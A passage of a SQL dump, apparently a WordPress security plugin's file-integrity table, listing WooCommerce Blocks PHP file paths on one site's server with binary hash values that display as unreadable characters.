_<TT','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartOrderSummaryCouponFormBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartOrderSummaryCouponFormBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͉Voϛ^Ib','j-گ\"R_CJ4ʚ~W','',0,'?'),('߱(?+;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartOrderSummaryDiscountBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CartOrderSummaryDiscountBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r0GDRŠL','#F}IX4pO|&:K^%ܤ{#\r)','',0,'?'),('4P:MȞ89_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryDiscountBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryDiscountBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6xD8`GY','wwg UceRQz: GG','',0,'?'),(' \n)8y,A','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryFeeBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryFeeBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0t!ٗ+','\'-ٝ<*|@SI~ewoJ','',0,'?'),('/\nGjݩT g','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryShippingBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryShippingBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U;\\`/&u4','5WU0\ZW$F nٷvM& q[','',0,'?'),('5XX4W+_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummarySubtotalBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummarySubtotalBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O 7M{r ',' Z>ͤVDM\r','',0,'?'),('z\r%@','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryTaxesBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutOrderSummaryTaxesBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Rl{','8ZcSCA[N`&xz{&','',0,'?'),('=)zjq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutPaymentBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutPaymentBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7tnrN۞','6džh.=wRZ1\\!.>8Z','',0,'?'),('W\0a?:f9Ժr`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutPickupOptionsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutPickupOptionsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i(ep','2fVH¡JkKj9#EU ','',0,'?'),('uU\ZS*i\0H>k o','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingAddressBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingAddressBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/yV>\r','݈ipX~.D&ܪ}Kk(\\[','',0,'?'),('݌0uwE\0\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\r7C/+f}','Yެ\n&$|YTIm\ZIBa','',0,'?'),('bt/\\`~|Y','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutShippingMethodsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`qSpf','EqtYA\'Azbە>-5','',0,'?'),('Ұp8:(/:4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTermsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTermsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!8˒64d?Oe@','\"1G)33CUrG$O','',0,'?'),('#ޏ\Ze','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTotalsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CheckoutTotalsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǝ\nHp˅(','8\nxZUl{s\"ЛZn','',0,'?'),('FMp0.-I','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ClassicTemplate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ClassicTemplate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qӐФV+m','ty\'}?>!Fs=n','',0,'?'),('\0WgIG׬r ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CustomerAccount.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/CustomerAccount.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zHEħ(QL','=X\Zb]2 SLb','',0,'?'),('TDbLHC>?^Ɂ0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/EmptyMiniCartContentsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/EmptyMiniCartContentsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pOWar\0','F ۿgl,rd^gc','',0,'?'),('D</pb{_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedCategory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedCategory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lNqXZA3','_T ~=dbejB;o[[,','',0,'?'),('kt&.Ej','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedItem.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedItem.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2M_hXۜT','%,ăb瑛.ҵNфoX','',0,'?'),('t#Աcle','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedProduct.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedProduct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kwLR>c\ru&','i>¬a|)6m','',0,'?'),('&q&w9meR','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledCartBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledCartBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')&~#EM@!','pkܺHwnOpwfHA3','',0,'?'),(' v7Wʹ,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledMiniCartContentsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilledMiniCartContentsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3()mҎk5','/^љ$_U8o`5&\nqXp','',0,'?'),('\n)i}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilterWrapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FilterWrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\nOF}#(=8H','v.*L&pEqEQyX','',0,'?'),('棄y)8LJ2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/HandpickedProducts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/HandpickedProducts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'n*\ZY1ݤ[ ','Zs SBY2E4[E.','',0,'?'),('ۯulv','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCart.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̛r gF86w','jQ@@DL{QŬh P','',0,'?'),('>8LFBi߷Jq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCartButtonBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCartButtonBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\0&aS]B\0/','\ZMw/ŗY/QjCJ','',0,'?'),('\0!ύW=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCheckoutButtonBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartCheckoutButtonBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ԉA','ٯJ턇bv6Ot4Q','',0,'?'),('j7n8Hw','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartContents.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartContents.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\\[YqyK.V','+ Dyb4Qa I4Q','',0,'?'),('rZ%&L','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartFooterBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartFooterBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\04xZ:PS=e','iLo-dg+bmpQq\"ON','',0,'?'),('cn}HV$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartItemsBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartItemsBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+<ƹ+AI','w4)Qg#ʺs2,?z@3','',0,'?'),('bް43.~YЧBy','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartProductsTableBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartProductsTableBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dD/b%Z!\rl','Kf)%%~eXj_PUY5۸clu','',0,'?'),('.1CnO53','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartShoppingButtonBlock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/MiniCartShoppingButtonBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','юjYJ[6ƑS`߂','ohNA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductBestSellers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductBestSellers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R;[*I뉉3','Coc1x1A֬xWR:]߃:8','',0,'?'),('Qq)`~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductButton.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductButton.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݷTntnhK ','o=J _W;5߮@;xo\n F!','',0,'?'),('㚕SUbPR ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategories.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Yߗڣ*','\nxԸ2foc׈$6@HCG','',0,'?'),('g A ҫe','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6s0NQX] ','njZ͛yL=wt/ں\rr&*bJk','',0,'?'),('fBnҥ]2ޚ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCollection.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCollection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8shTA=g?\ZՌ`HД-','',0,'?'),('VdI͏ӓF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%V\\G','pm]E)H^z 9','',0,'?'),('UcS,wD#f','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImageGallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductImageGallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׬r-l^ V','=zܱ7-})n Y6e','',0,'?'),('й\\❙','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductNew.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductNew.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c$ds;<',')IJC\"L}V:٩Kj.*Ӽ','',0,'?'),('FɔR<\\CE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductOnSale.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductOnSale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DXz','/\'ve f@c)ƒ;Yi,','',0,'?'),('P8e3poԉ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductPrice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductPrice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8ժҮJA\rTj','~@nN|KT?Frm','',0,'?'),('g뾓77','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductQuery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductQuery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M[y','ȝQwǍZY]?G2\0\0{;','',0,'?'),('?h svɣ:l','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRating.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductRating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r =u\\˜','Rx&r, NֹHgngy@O4e,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSaleBadge.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSaleBadge.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XԠl+\Zqx','-\Z\"\" d#\"g-2`Mc','',0,'?'),('5+E| tG','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSearch.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSearch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gKaLc\0I','jwoJwQWdWs-.','',0,'?'),('Q!o&ܞ;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductStockIndicator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductStockIndicator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M*D9WA z$','thzƱɓYn !8\0y\'oO\0\nN=M','',0,'?'),('}hM5Ms^G`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSummary.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductSummary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I{0mKУ','mN.\rU-=튍[o$i','',0,'?'),('bLP!<4t0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTag.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aui=8','\n戰;YJ-r{mMc~8;DW]','',0,'?'),('hu]\0V1;|ei','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTemplate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTemplate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"mz}̹','OGwߛvK\ZQ0q59&','',0,'?'),('D)L\n(','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTitle.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=FA.QedY','$фrG[z eL:#\\ak','',0,'?'),('dhC\Zg2)j#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTopRated.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTopRated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','  \rDL\Z',' L¬t/\0kiAX}7gwh','',0,'?'),('bQdFu7u','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByCategory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByCategory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\n\'Fn/\Zs','\"\n`SMV 镽H؅PGPg]_','',0,'?'),('_YWI`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByProduct.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ReviewsByProduct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t3jkik','] HOWwu?ĉ +U_qnܘ','',0,'?'),('C= TKH2q','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/SingleProduct.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/SingleProduct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Bi\Z.cZ\\','AZ@/uקT\0rO v*','',0,'?'),('bc}A<kX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StockFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StockFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[7<Z7v\0p','F\0{a5s&=&MekLwO','',0,'?'),('ȅ3j 5n ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StoreNotices.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/StoreNotices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ga~\r$%\'%خi','1\n*ϗJ:>.ئZKai.','',0,'?'),('kIf?Wo#~B','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypesController.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypesController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$DRXto֮','v\0.Z#݇x}v \r+~-','',0,'?'),('u\Z*/KˆA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Bootstrap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:<>e؞O','V~rGG^eux:Ԉ,','',0,'?'),('\r[|','',0,'?'),('Scogr1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Notices.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0. z4wSdWS','-%1-%\";G4{','',0,'?'),('1\'@T#\\k2:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/InboxNotifications.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/InboxNotifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_PxTB0t\"','d^m K԰Wy im','',0,'?'),('?Qeu-@jYP','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Installer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç$TXuR6u','HN:\nƃMԼJ,Q;\Zs|','',0,'?'),('NqݯV-.L','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9W\'ڝn%n','1ZYK&R[:_n/얛׻m','',0,'?'),(')ҙ@`VF؏','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationRegistry.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Integrations/IntegrationRegistry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bPldS ',',0D\\;*;ꡎEް⟻)i&[S','',0,'?'),('wI`/j[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/class-wc-interactivity-store.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/class-wc-interactivity-store.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E}pOM{fa}B','Ǩ\ZAkF[zٙpL-','',0,'?'),('k$|?uLj','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EzYx|$>;','D Ї&n5Y 굠$N(Y3e','',0,'?'),('\nn&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/scripts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n.6/jFY','{=b5ۦxL< k','',0,'?'),('? &X~s','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/store.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Interactivity/store.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$nw(3Qa`','?Z̉ChDZJ6 L\ZEN','',0,'?'),('\\~^bk)KA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Library.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\n\r*%St','4a.[D|s$6KB:R','',0,'?'),('ԅN1K S','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Migration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\k 1%','ĴjbU,oV:3Z4E','',0,'?'),('A;ROy','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zRō4!Rc','!+^YG+W2>%@T','',0,'?'),('̓/Y6}%Z !','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Package.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Package.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r9u@i4sj','b-c}h:\"qt _WI\r','',0,'?'),('+@&#k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Patterns/dictionary.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Patterns/dictionary.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kd{ _Cנ','vB\rĊ(JgB9Naj','',0,'?'),('jEyY$2\'<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[u#?5!mNc','n %5+WlmvDg4k','',0,'?'),('ρX{lJ\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/AbstractPaymentMethodType.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/AbstractPaymentMethodType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G^5lG',' \n]h(\\XROے','',0,'?'),('D!ԯ F','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/BankTransfer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/BankTransfer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܯl\n8>1^Obw1˘','.~;7*~i?~Y1@(6','',0,'?'),('.vFcuzA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/CashOnDelivery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/CashOnDelivery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\'*cTq{','9֙qB?&zrЄ9dtMǢ','',0,'?'),('4)hZ\'}w','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/Cheque.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Payments/Integrations/C